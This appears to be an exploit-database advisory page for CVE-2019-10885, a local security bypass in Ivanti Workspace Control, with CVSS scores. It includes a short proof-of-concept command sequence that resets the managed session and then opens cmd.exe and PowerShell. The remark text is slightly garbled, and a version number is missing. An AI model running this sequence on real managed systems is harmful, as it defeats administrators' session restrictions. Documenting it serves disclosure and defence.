Ivanti Workspace Manager Security Bypass

Credit: Juan Sacco
Risk: Low
Local: Yes
Remote: No
CWE: CWE-264

CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Rem Remarks CVE-2019-10885 - 0day <jsacco@exploitpack.com> Rem An issue was discovered in Ivanti Workspace Control before Local authenticated Rem users with low privileges in a Workspace Control managed session can bypass Workspace Control Rem security features configured for this session by resetting the session context. "%PROGRAMFILES(X86)%\RES Software\Workspace Manager\pwrgate.exe -2" "%PROGRAMFILES(X86)%\RES Software\Workspace Manager\pwrinit.exe" cmd.exe /k powershell.exe

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com


Back to Top